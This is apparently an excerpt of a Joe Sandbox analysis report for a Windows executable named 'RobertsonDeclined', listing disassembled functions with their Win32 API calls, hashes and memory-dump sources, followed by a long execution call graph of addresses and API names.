                                                                                                    • Snapshot File: hcaresult_3_2_400000_RobertsonDeclined.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Global$AddressAllocByteCharFreeMultiProcWide
                                                                                                    • String ID:
                                                                                                    • API String ID: 2883127279-0
                                                                                                    • Opcode ID: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
                                                                                                    • Instruction ID: 581917a1a4a7218ca9fbbc4554f9bfb31441e22884f00dccc1ee77d568dea7f2
                                                                                                    • Opcode Fuzzy Hash: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
                                                                                                    • Instruction Fuzzy Hash: 19E048712012107BE2101B669E8CD677EADDFCA7B6B05013EF695F51A0CE348C15D675
                                                                                                    APIs
                                                                                                    • GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
                                                                                                    • lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.1351996044.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.1351975024.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352015228.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352125885.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_400000_RobertsonDeclined.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: PrivateProfileStringlstrcmp
                                                                                                    • String ID: !N~
                                                                                                    • API String ID: 623250636-529124213
                                                                                                    • Opcode ID: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
                                                                                                    • Instruction ID: 7cd271610f6b1cb64eb4c57d825f56a096f62725fe87e34e9129affe44791136
                                                                                                    • Opcode Fuzzy Hash: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
                                                                                                    • Instruction Fuzzy Hash: 37E0E571500208ABDB00BBA0DE85DAE7BBCAF05304F14443AF641F71E3EA7459028718
                                                                                                    APIs
                                                                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
                                                                                                    • CloseHandle.KERNEL32(?), ref: 00405C71
                                                                                                    Strings
                                                                                                    • Error launching installer, xrefs: 00405C48
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.1351996044.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.1351975024.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352015228.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352125885.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_400000_RobertsonDeclined.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseCreateHandleProcess
                                                                                                    • String ID: Error launching installer
                                                                                                    • API String ID: 3712363035-66219284
                                                                                                    • Opcode ID: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
                                                                                                    • Instruction ID: c3c9ba135fb9cbcc5263534f4c07e322ce29f53e9eda4e03cc008bde6a4ec24c
                                                                                                    • Opcode Fuzzy Hash: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
                                                                                                    • Instruction Fuzzy Hash: 44E0EC70504209ABEF009B64EE49E7F7BBCEB00305F504575BD51E2561D774D9188A68
                                                                                                    APIs
                                                                                                    • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                    • wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                      • Part of subcall function 004060E7: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.1351996044.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.1351975024.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352015228.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352125885.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_400000_RobertsonDeclined.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseHandlelstrlenwvsprintf
                                                                                                    • String ID: RMDir: RemoveDirectory invalid input("")
                                                                                                    • API String ID: 3509786178-2769509956
                                                                                                    • Opcode ID: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
                                                                                                    • Instruction ID: 8d95e7b1bd6a8fe250904a0927f32055e446839aab417a06e937ad69edd5bb19
                                                                                                    • Opcode Fuzzy Hash: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
                                                                                                    • Instruction Fuzzy Hash: 04D05E34150316BACA009BA0DE09E997B64FBD0384F50442EF147C5070FA748001C70E
                                                                                                    APIs
                                                                                                    • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
                                                                                                    • lstrcmpiA.KERNEL32(?,?), ref: 00405DDE
                                                                                                    • CharNextA.USER32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DEF
                                                                                                    • lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.1351996044.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.1351975024.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352015228.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352125885.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_400000_RobertsonDeclined.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: lstrlen$CharNextlstrcmpi
                                                                                                    • String ID:
                                                                                                    • API String ID: 190613189-0
                                                                                                    • Opcode ID: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
                                                                                                    • Instruction ID: 82a91399e33c41d3abe84131f59dcd741317d7299bce3ff9d06b8c6e92496674
                                                                                                    • Opcode Fuzzy Hash: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
                                                                                                    • Instruction Fuzzy Hash: D5F0CD31205988EFCB019FA9CD04C9FBBA8EF56350B2180AAE840E7310D630EE01DBA4

                                                                                                    Execution Graph

                                                                                                    Execution Coverage:0.8%
                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                    Signature Coverage:5.9%
                                                                                                    Total number of Nodes:810
                                                                                                    Total number of Limit Nodes:39
                                                                                                    execution_graph 109769 1c72ec 109862 1c64f0 109769->109862 109773 1c730c 109895 23f690 109773->109895 109775 1c7311 109776 1c731a 109775->109776 109953 245b50 8 API calls 109775->109953 109917 23e4e0 8 API calls 109776->109917 109779 1c7327 109918 23e650 8 API calls 109779->109918 109780 1c7eb2 109954 245b50 8 API calls 109780->109954 109783 1c7333 110006 1c32c0 89 API calls 109783->110006 109784 1c7ec6 109955 245b50 8 API calls 109784->109955 109787 1c733f 109919 1c6c20 32 API calls 109787->109919 109788 1c7eda 109956 245b50 8 API calls 109788->109956 109791 1c7eee 109957 245b50 8 API calls 109791->109957 109792 1c7344 109920 1c6e30 9 API calls 109792->109920 109795 1c7f02 109958 27f220 fputc _errno fputc 109795->109958 109796 1c7349 malloc 109798 1c735d 109796->109798 110007 1ce3e0 456 API calls 109798->110007 109799 1c7f23 109959 245670 109799->109959 109801 1c7f4b LoadIconW 109801->109776 109806 1c7f73 109801->109806 109804 1c7384 109921 1cd6d0 GetSystemMetrics GetSystemMetrics 109804->109921 110025 1c6a60 33 API calls 109806->110025 109807 1c7392 109922 240e10 8 API calls 109807->109922 109810 1c7f7b 109810->109810 109811 1c73a7 109923 240dd0 8 API calls 109811->109923 109813 1c73bc 109924 240d10 8 API calls 109813->109924 109815 1c73d1 109925 240d50 8 API calls 109815->109925 109817 1c73e6 malloc 109818 1c73fa 109817->109818 109926 1c22f0 10 API calls 109818->109926 109820 1c744d 109927 1c5ef0 109820->109927 109826 1c757a 109827 1c74a4 109826->109827 109827->109826 109952 1c5100 CreateMutexW 109827->109952 109829 1c7ab8 109830 1c7acc GetActiveWindow 109829->109830 110009 23ccba 68 API calls 109830->110009 109832 1c7aef 110010 23c410 26 API calls 109832->110010 109834 1c7b06 110011 23720d 81 API calls 109834->110011 109836 1c7b31 110012 231c71 234 API calls 109836->110012 109838 1c7b7f 110013 2330a8 36 API calls 109838->110013 109841 1c7c89 110019 23718a 86 API calls 109841->110019 109842 1c7bb7 109842->109841 109844 1c7bdd WaitForSingleObject 109842->109844 109850 1c7c18 ReleaseMutex 109842->109850 110015 1c7010 9 API calls 109842->110015 110016 23e5e0 8 API calls 109842->110016 110017 246fe0 32 API calls 109842->110017 110018 246170 8 API calls 109842->110018 110014 1c5a40 WaitForSingleObject ReleaseMutex 109844->110014 109845 1c7c8e 110020 23ccba 68 API calls 109845->110020 109848 1c7ca9 110021 1c5150 CloseHandle CloseHandle 109848->110021 109850->109842 109851 1c7cb8 110022 1e6ac0 CloseHandle 109851->110022 109853 1c7cc4 110023 1e6fe0 malloc free 109853->110023 109856 1c7cf9 110024 1e6fe0 malloc free 109856->110024 109860 1c7d06 109861 1c7d53 17 API calls 109860->109861 110026 1c2090 109862->110026 109865 1c651b PathRemoveFileSpecA 109867 1c6531 109865->109867 109869 1c656e MessageBoxW exit 109865->109869 109868 1c5ef0 7 API calls 109867->109868 109870 1c6551 109868->109870 109870->109869 109871 1c6555 free 109870->109871 110032 1c2440 7 API calls 109871->110032 109873 1c6565 109874 1c6930 109873->109874 110043 1c65e0 109874->110043 109877 1c5ef0 7 API calls 109878 1c696b CreateMutexW 109877->109878 109879 1c698d WaitForSingleObject 109878->109879 109880 1c6a0b 109878->109880 109881 1c69a9 strlen 109879->109881 109882 1c6a3b 109879->109882 110080 1c27a0 8 API calls 109880->110080 110076 1c24a0 GetTempPathW GetTempFileNameW 109881->110076 110082 1c27a0 8 API calls 109882->110082 109885 1c6a17 exit 109889 1c6a23 109885->109889 109887 1c6a47 exit 109888 1c69c4 110077 1c2540 CreateFileW 109888->110077 110081 1c27a0 8 API calls 109889->110081 109893 1c6a2f exit 109893->109882 109894 1c69e1 CreateMutexW 109894->109773 109896 23f6a0 109895->109896 109897 23f699 109895->109897 110106 247720 SystemParametersInfoW SystemParametersInfoW LoadLibraryA 109896->110106 109897->109775 109899 23f6d7 109916 23f6fb 109899->109916 110169 24a7f0 InitializeCriticalSection 109899->110169 109903 23f6e7 109903->109916 110170 24a720 12 API calls 109903->110170 109905 23f6f7 109905->109916 110171 24a720 12 API calls 109905->110171 109907 23f71c 109907->109916 110172 24a7c0 TlsSetValue 109907->110172 109909 23f734 110173 24a6d0 QueryPerformanceCounter 109909->110173 109911 23f743 110174 245a30 8 API calls 109911->110174 109913 23f780 109913->109775 109915 23f753 109915->109913 109915->109916 110175 2413d0 27 API calls 109915->110175 110147 23efc0 109916->110147 109917->109779 109918->109783 109919->109792 109920->109796 109921->109807 109922->109811 109923->109813 109924->109815 109925->109817 109926->109820 110243 2661d0 109927->110243 109929 1c5f17 109930 32dda0 109929->109930 109931 32ddb2 malloc 109930->109931 109932 1c7486 109931->109932 109933 32ddc3 109931->109933 110008 1eaf10 398 API calls 109932->110008 109933->109931 109934 3308b8 109933->109934 110252 32de40 malloc 109934->110252 109952->109829 109953->109780 109954->109784 109955->109788 109956->109791 109957->109795 109958->109799 109960 24598c 109959->109960 109961 245688 109959->109961 109967 2459b0 109960->109967 110556 23f1d0 8 API calls 109960->110556 109963 245960 109961->109963 109964 2456a6 109961->109964 110555 23f1d0 8 API calls 109963->110555 110486 23dfa0 8 API calls 109964->110486 109967->109960 109969 2459ba 109967->109969 109968 24576c 109970 245774 calloc 109968->109970 109971 245950 109968->109971 110557 24a7a0 TlsGetValue 109969->110557 110487 24cbd0 109970->110487 109971->109801 109974 2459d5 109976 245a07 109974->109976 109977 2459d9 109974->109977 109975 245849 109975->109967 109978 245859 109975->109978 110549 23e860 14 API calls 109975->110549 110559 23e4e0 8 API calls 109976->110559 110558 24d350 10 API calls 109977->110558 109981 245864 109978->109981 109982 245900 109978->109982 109984 245873 109981->109984 110554 240310 GetClientRect ClientToScreen SetCursorPos 109981->110554 109982->109984 109985 24590f 109982->109985 109984->109801 110552 24e1a0 ShowWindow 109985->110552 109986 24588c 109986->109978 109988 245890 109986->109988 109988->109960 109992 24589e 109988->109992 109991 245917 109991->109984 110553 24e230 BringWindowToTop SetForegroundWindow SetFocus 109991->110553 110550 24a7a0 TlsGetValue 109992->110550 109993 24593b 109993->109801 109996 2458b9 109998 245a15 109996->109998 109999 2458c1 109996->109999 109997 24592e 109997->109984 110560 23e4e0 8 API calls 109998->110560 110551 24d350 10 API calls 109999->110551 110002 245a21 110002->110002 110003 2458c9 110004 2458d3 110003->110004 110005 2458e8 free 110003->110005 110004->109801 110005->109984 110006->109787 110007->109804 110008->109827 110009->109832 110010->109834 110011->109836 110012->109838 110013->109842 110014->109842 110015->109842 110016->109842 110017->109842 110018->109842 110019->109845 110020->109848 110021->109851 110022->109853 110023->109856 110024->109860 110025->109810 110033 1c1ff0 110026->110033 110028 1c20b9 110029 1c20e7 110028->110029 110030 1c20c0 free 110028->110030 110029->109865 110029->109869 110031 1c1ff0 4 API calls 110030->110031 110031->110028 110032->109873 110034 1c2003 110033->110034 110035 1c207f 110034->110035 110036 1c2008 strcspn 110034->110036 110035->110028 110037 1c201e malloc 110036->110037 110038 1c2048 malloc 110036->110038 110041 1c2030 110037->110041 110039 1c206d 110038->110039 110040 1c2059 memcpy 110038->110040 110039->110034 110042 1c2036 110039->110042 110040->110039 110041->110042 110042->110028 110083 1c1aa0 GetModuleHandleW FindResourceW 110043->110083 110045 1c6602 110090 1c1fa0 malloc 110045->110090 110047 1c6632 110048 1c1fa0 2 API calls 110047->110048 110049 1c6667 110048->110049 110050 1c1fa0 2 API calls 110049->110050 110051 1c669c 110050->110051 110052 1c1fa0 2 API calls 110051->110052 110053 1c66d1 110052->110053 110054 1c1fa0 2 API calls 110053->110054 110055 1c6706 110054->110055 110056 1c1fa0 2 API calls 110055->110056 110057 1c673b 110056->110057 110058 1c1fa0 2 API calls 110057->110058 110059 1c6770 110058->110059 110093 1c1f60 malloc 110059->110093 110061 1c67a3 110062 1c1f60 2 API calls 110061->110062 110063 1c67d6 110062->110063 110096 1c1f20 malloc 110063->110096 110065 1c680b 110066 1c1f20 2 API calls 110065->110066 110067 1c6846 110066->110067 110068 1c1f20 2 API calls 110067->110068 110069 1c6881 110068->110069 110070 1c1f20 2 API calls 110069->110070 110071 1c68bc 110070->110071 110072 1c1f60 2 API calls 110071->110072 110073 1c690d 110072->110073 110099 1c1b80 110073->110099 110076->109888 110078 1c258e WriteFile CloseHandle 110077->110078 110079 1c25cf 110077->110079 110078->110079 110079->109889 110079->109894 110080->109885 110081->109893 110082->109887 110084 1c1add LoadResource 110083->110084 110088 1c1b33 110083->110088 110085 1c1af3 LockResource 110084->110085 110084->110088 110086 1c1b05 SizeofResource 110085->110086 110085->110088 110087 1c1b38 110086->110087 110086->110088 110087->110088 110105 1c1a20 malloc memcpy realloc realloc 110087->110105 110088->110045 110091 1c1fd9 110090->110091 110092 1c1fbb memcpy 110090->110092 110091->110047 110092->110091 110094 1c1f7a memcpy 110093->110094 110095 1c1f92 110093->110095 110094->110095 110095->110061 110097 1c1f4b 110096->110097 110098 1c1f37 memcpy 110096->110098 110097->110065 110098->110097 110100 1c1b90 110099->110100 110101 1c1bb3 110099->110101 110102 1c1b98 free 110100->110102 110101->109877 110102->110102 110103 1c1baf 110102->110103 110103->110101 110104 1c1bc0 free 110103->110104 110105->110087 110107 247794 GetProcAddress LoadLibraryA 110106->110107 110108 247d1e 110106->110108 110110 247d3e 110107->110110 110111 2477c8 7 API calls 110107->110111 110197 2470e0 11 API calls 110108->110197 110198 2470e0 11 API calls 110110->110198 110114 247874 GetProcAddress 110111->110114 110115 247889 110111->110115 110112 247d34 110112->109899 110114->110115 110117 2478ce LoadLibraryA 110115->110117 110119 24790e LoadLibraryA 110115->110119 110116 247d54 110116->109899 110117->110115 110118 2478df GetProcAddress GetProcAddress 110117->110118 110118->110119 110120 247923 GetProcAddress GetProcAddress GetProcAddress 110119->110120 110121 24796c LoadLibraryA 110119->110121 110120->110121 110122 2479b0 LoadLibraryA 110121->110122 110123 247981 GetProcAddress GetProcAddress 110121->110123 110124 2479c5 GetProcAddress 110122->110124 110125 2479da 110122->110125 110123->110122 110124->110125 110176 2473a0 110125->110176 110129 247570 VerSetConditionMask VerSetConditionMask VerSetConditionMask 110130 247cf1 110129->110130 110130->110129 110132 247d14 110130->110132 110133 247d5e GetModuleHandleW CreateWindowExW 110130->110133 110185 24ca70 GetModuleHandleW LoadCursorW GetModuleHandleW LoadImageW 110130->110185 110199 2470e0 11 API calls 110130->110199 110132->109899 110133->110130 110134 247ddf ShowWindow 110133->110134 110136 247df7 110134->110136 110136->110136 110137 247e03 RegisterDeviceNotificationW 110136->110137 110138 247e90 PeekMessageW 110137->110138 110139 247e80 TranslateMessage DispatchMessageW 110138->110139 110140 247ebd 110138->110140 110139->110138 110191 24a680 QueryPerformanceFrequency 110140->110191 110142 247ec2 110192 248f00 110142->110192 110148 23efe3 110147->110148 110149 23eff4 110147->110149 110148->110149 110230 2460a0 18 API calls 110148->110230 110156 23f011 110149->110156 110231 240bf0 19 API calls 110149->110231 110151 23f048 free free 110202 2443e0 FreeLibrary 110151->110202 110155 23f08f 110203 247f60 110155->110203 110156->110151 110158 242be0 8 API calls 110156->110158 110161 23f126 110156->110161 110236 24a530 11 API calls 110156->110236 110158->110156 110160 23f0c9 110232 24a770 110160->110232 110161->110151 110162 23f0b0 free 110162->110160 110162->110162 110165 24a770 TlsFree 110166 23f0e3 110165->110166 110235 24a820 DeleteCriticalSection 110166->110235 110168 23f0ef 110168->109775 110169->109903 110170->109905 110171->109907 110172->109909 110173->109911 110174->109915 110175->109915 110177 2473f0 110176->110177 110178 2474e1 110177->110178 110179 247461 MapVirtualKeyW 110177->110179 110180 24747b ToUnicode 110177->110180 110182 2473f4 WideCharToMultiByte 110177->110182 110183 247650 VerSetConditionMask VerSetConditionMask VerSetConditionMask 110178->110183 110179->110180 110180->110177 110181 2474b0 ToUnicode 110180->110181 110181->110177 110182->110177 110184 247700 110183->110184 110184->110130 110186 24cb60 LoadImageW 110185->110186 110187 24cb20 RegisterClassExW 110185->110187 110186->110187 110188 24cb4e 110187->110188 110189 24cb3a 110187->110189 110188->110130 110200 2470e0 11 API calls 110189->110200 110191->110142 110193 248f09 GetModuleHandleW 110192->110193 110194 248f48 110192->110194 110193->110194 110201 23f1d0 8 API calls 110194->110201 110196 248f79 110197->110112 110198->110116 110199->110130 110200->110188 110201->110196 110202->110155 110204 247f6c UnregisterDeviceNotification 110203->110204 110205 247f78 110203->110205 110204->110205 110206 247f81 DestroyWindow 110205->110206 110207 247f8d 110205->110207 110206->110207 110237 24cba0 GetModuleHandleW UnregisterClassW 110207->110237 110209 247f92 SystemParametersInfoW free free 110238 250b50 110209->110238 110211 247fda 110241 251e60 FreeLibrary 110211->110241 110213 247fdf 110242 248a50 free free free free free 110213->110242 110215 247fe4 110216 247fed FreeLibrary 110215->110216 110217 247ff9 110215->110217 110216->110217 110218 248002 FreeLibrary 110217->110218 110219 24800e 110217->110219 110218->110219 110220 248017 FreeLibrary 110219->110220 110221 248023 110219->110221 110220->110221 110222 24802c FreeLibrary 110221->110222 110223 248038 110221->110223 110222->110223 110224 248041 FreeLibrary 110223->110224 110225 24804d 110223->110225 110224->110225 110226 248056 FreeLibrary 110225->110226 110227 248062 110225->110227 110226->110227 110228 23f094 110227->110228 110229 24806b FreeLibrary 110227->110229 110228->110160 110228->110162 110229->110228 110230->110148 110231->110149 110233 23f0d7 110232->110233 110234 24a77e TlsFree 110232->110234 110233->110165 110234->110233 110235->110168 110236->110156 110237->110209 110239 250b70 110238->110239 110240 250b59 FreeLibrary 110238->110240 110239->110211 110240->110211 110240->110239 110241->110213 110242->110215 110244 266220 110243->110244 110245 2661e9 110243->110245 110251 26f300 7 API calls 110244->110251 110250 26f300 7 API calls 110245->110250 110248 266208 110248->109929 110249 266240 110249->109929 110250->110248 110251->110249 110253 32de82 110252->110253 110254 32de57 110252->110254 110268 284250 110253->110268 110259 32e450 110254->110259 110256 32de89 110256->110254 110290 3295b0 232 API calls 110256->110290 110258 32de94 110482 32e140 66 API calls 110259->110482 110261 32e459 110483 25f810 128 API calls 110261->110483 110263 32e48a 110484 32dea0 232 API calls 110263->110484 110265 32e492 110485 3295b0 232 API calls 110265->110485 110267 32e497 110291 275d20 110268->110291 110270 3305c0 110336 289d50 232 API calls 110270->110336 110272 2842b3 110327 276070 110272->110327 110275 32de40 231 API calls 110277 3305d1 110275->110277 110276 284264 110276->110270 110276->110272 110279 32e450 231 API calls 110277->110279 110278 2842ce 110278->110256 110280 3305ef 110279->110280 110281 3305f7 110280->110281 110282 3305fc 110280->110282 110337 32df80 232 API calls 110281->110337 110310 25fa60 110282->110310 110285 330601 110286 330627 malloc 110285->110286 110287 330646 110286->110287 110338 1c14d0 _onexit 110287->110338 110289 330664 110289->110256 110290->110258 110292 275d35 110291->110292 110293 275d78 110291->110293 110294 275d85 110292->110294 110296 275d46 110292->110296 110298 275d9f 110292->110298 110299 275de8 GetCurrentThreadId 110292->110299 110339 275cb0 malloc free 110293->110339 110294->110276 110300 275d60 GetCurrentThreadId 110296->110300 110303 275d4d 110296->110303 110297 275d7f 110297->110292 110297->110294 110301 275da6 110298->110301 110302 275e18 CreateEventA 110298->110302 110299->110298 110299->110303 110300->110276 110301->110296 110306 275db3 110301->110306 110304 275e46 110302->110304 110305 275e68 GetLastError 110302->110305 110303->110276 110304->110301 110307 275e53 CloseHandle 110304->110307 110306->110301 110309 275dca 110306->110309 110340 275b70 GetTickCount64 GetTickCount64 WaitForSingleObject WaitForSingleObject 110306->110340 110307->110301 110309->110276 110341 25f1d0 110310->110341 110313 25faa6 110362 25f310 110 API calls 110313->110362 110314 25faf2 110363 25f430 110 API calls 110314->110363 110317 25faab 110318 25fab4 110317->110318 110319 332956 abort 110317->110319 110354 25d780 110318->110354 110321 33295b abort abort 110319->110321 110323 332968 abort abort 110321->110323 110322 25fac1 110322->110285 110324 3329a1 abort 110323->110324 110325 3329a6 abort 110324->110325 110326 3329b9 110325->110326 110328 276082 110327->110328 110329 2760a0 110327->110329 110330 276098 110328->110330 110333 2760cb GetCurrentThreadId 110328->110333 110335 27608d 110328->110335 110481 275cb0 malloc free 110329->110481 110330->110275 110330->110278 110332 2760a5 110332->110328 110332->110330 110333->110330 110333->110335 110334 2760f8 SetEvent 110334->110330 110335->110330 110335->110334 110338->110289 110339->110297 110340->110306 110364 25eb70 110341->110364 110344 332938 abort 110345 332968 abort abort 110344->110345 110347 3329a1 abort 110345->110347 110348 3329a6 abort 110347->110348 110353 3329b9 110348->110353 110349 25f223 110349->110344 110350 25f23d 110349->110350 110420 25e0a0 110350->110420 110352 25f27e 110352->110313 110352->110314 110353->110353 110359 25d799 110354->110359 110355 332910 abort 110356 332968 abort abort 110355->110356 110357 3329a1 abort 110356->110357 110358 3329a6 abort 110357->110358 110361 3329b9 110358->110361 110359->110355 110360 25d88d 110359->110360 110360->110322 110361->110361 110362->110317 110363->110317 110365 25eb9f 110364->110365 110369 25edeb 110364->110369 110437 261550 78 API calls 110365->110437 110367 25ebb8 110368 25ebc4 strlen 110367->110368 110367->110369 110370 25ebfa 110368->110370 110369->110344 110389 277530 110369->110389 110370->110369 110370->110370 110371 25ed3a 110370->110371 110373 25ee20 110370->110373 110371->110369 110384 25eda9 110371->110384 110438 25e3b0 10 API calls 110371->110438 110440 25d910 abort abort abort abort abort 110373->110440 110375 25ee74 110375->110369 110379 332933 abort 110375->110379 110377 25edd5 110439 25e3b0 10 API calls 110377->110439 110378 25ed58 110378->110369 110378->110375 110378->110379 110380 25ed88 110378->110380 110382 332968 abort abort 110379->110382 110383 25eef0 110380->110383 110380->110384 110385 3329a1 abort 110382->110385 110383->110377 110441 25d910 abort abort abort abort abort 110383->110441 110384->110377 110442 25d910 abort abort abort abort abort 110384->110442 110386 3329a6 abort 110385->110386 110388 3329b9 110386->110388 110388->110388 110390 277549 110389->110390 110391 277668 110389->110391 110392 277584 110390->110392 110393 27754e 110390->110393 110391->110349 110392->110349 110443 2764c0 calloc calloc 110393->110443 110395 277555 110396 275d20 11 API calls 110395->110396 110397 277562 110396->110397 110398 277590 110397->110398 110399 277568 110397->110399 110400 2775aa TlsGetValue 110398->110400 110445 276b30 23 API calls 110398->110445 110401 277571 110399->110401 110406 277645 fprintf 110399->110406 110403 2775c5 110400->110403 110404 2776a8 110400->110404 110405 276070 4 API calls 110401->110405 110415 277681 110401->110415 110407 2775df TlsGetValue 110403->110407 110403->110415 110446 276b30 23 API calls 110403->110446 110408 276bd0 31 API calls 110404->110408 110409 277579 110405->110409 110406->110401 110411 2775f4 110407->110411 110412 277690 110407->110412 110408->110403 110409->110392 110444 2767f0 CloseHandle free free fprintf 110409->110444 110411->110415 110416 277612 TlsGetValue 110411->110416 110447 276b30 23 API calls 110411->110447 110414 276bd0 31 API calls 110412->110414 110414->110411 110416->110401 110417 277678 110416->110417 110448 276bd0 110417->110448 110427 25e0ce 110420->110427 110421 25e360 110422 332924 abort 110421->110422 110423 25e388 110421->110423 110424 332968 abort abort 110422->110424 110425 3329a1 abort 110424->110425 110426 3329a6 abort 110425->110426 110429 3329b9 110426->110429 110427->110421 110427->110423 110431 25e10c 110427->110431 110479 25d97e abort abort abort abort abort 110427->110479 110429->110429 110431->110421 110431->110422 110433 25dab0 abort abort abort abort abort 110431->110433 110434 25e21f 110431->110434 110435 25e3e0 110431->110435 110432 25e444 110432->110352 110433->110431 110434->110352 110435->110432 110436 33292e abort 110435->110436 110480 25d910 abort abort abort abort abort 110435->110480 110436->110424 110437->110367 110438->110378 110439->110369 110440->110375 110441->110377 110442->110377 110443->110395 110444->110392 110445->110400 110446->110407 110447->110416 110462 2768e0 110448->110462 110451 276d00 110451->110401 110452 276bf4 GetCurrentThreadId CreateEventA 110453 276c41 110452->110453 110454 276d0c 110453->110454 110455 276c4a GetCurrentProcess GetCurrentThread GetCurrentProcess DuplicateHandle 110453->110455 110476 276700 GetCurrentThreadId _ultoa OutputDebugStringA abort 110454->110476 110457 3329a6 abort 110455->110457 110458 276cae GetThreadPriority TlsSetValue 110455->110458 110461 3329b9 110457->110461 110459 276d11 110458->110459 110460 276ced 110458->110460 110459->110457 110460->110401 110461->110461 110463 275d20 11 API calls 110462->110463 110464 2768f1 110463->110464 110465 2768fb 110464->110465 110466 276948 calloc 110464->110466 110477 276570 malloc memmove realloc 110465->110477 110467 276925 110466->110467 110468 276962 110466->110468 110470 276070 4 API calls 110467->110470 110478 276570 malloc memmove realloc 110468->110478 110473 276931 110470->110473 110472 276902 110472->110467 110473->110451 110473->110452 110474 276967 110474->110472 110475 276988 free 110474->110475 110475->110467 110477->110472 110478->110474 110479->110431 110480->110435 110481->110332 110482->110261 110483->110263 110484->110265 110485->110267 110486->109968 110488 24cf60 110487->110488 110489 24cbf3 